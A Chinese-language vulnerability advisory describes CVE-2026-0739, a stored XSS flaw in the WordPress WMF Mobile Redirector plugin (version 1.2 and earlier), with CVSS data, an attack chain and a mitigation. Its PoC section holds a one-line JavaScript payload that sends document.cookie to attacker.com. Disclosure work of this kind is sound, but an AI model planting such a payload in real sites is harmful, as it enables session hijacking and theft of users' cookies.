IPBUF安全漏洞报告
English
CVE-2026-0739 CVSS 4.4 中危

CVE-2026-0739 WordPress WMF Mobile Redirector插件存储型XSS漏洞

披露日期: 2026-01-14

漏洞信息

漏洞编号
CVE-2026-0739
漏洞类型
存储型XSS
CVSS评分
4.4 中危
攻击向量
网络 (AV:N)
认证要求
高权限 (PR:H)
用户交互
无需交互 (UI:N)
影响产品
WMF Mobile Redirector plugin for WordPress

相关标签

WordPressXSS存储型XSS插件漏洞

漏洞概述

WMF Mobile Redirector是WordPress的一个移动设备重定向插件。该插件在1.2及之前的所有版本中存在存储型跨站脚本(XSS)漏洞。

技术细节

攻击者通过在插件设置页面注入恶意JavaScript代码,由于服务器端缺乏对用户输入的有效过滤和转义处理,这些恶意脚本会被永久存储在数据库中。当其他用户访问相关页面时,浏览器会执行这些恶意脚本,导致会话劫持、敏感信息窃取等安全问题。

攻击链分析

STEP 1
1
攻击者以管理员权限登录WordPress后台
STEP 2
2
访问插件设置页面并注入XSS payload
STEP 3
3
payload被保存到数据库中
STEP 4
4
当其他用户访问受影响页面时,恶意脚本执行

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
window.location.href='https://attacker.com/log?cookie='+document.cookie

影响范围

1.2及之前版本

防御指南

临时缓解措施
暂时禁用或删除该插件,等待官方发布修复版本

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表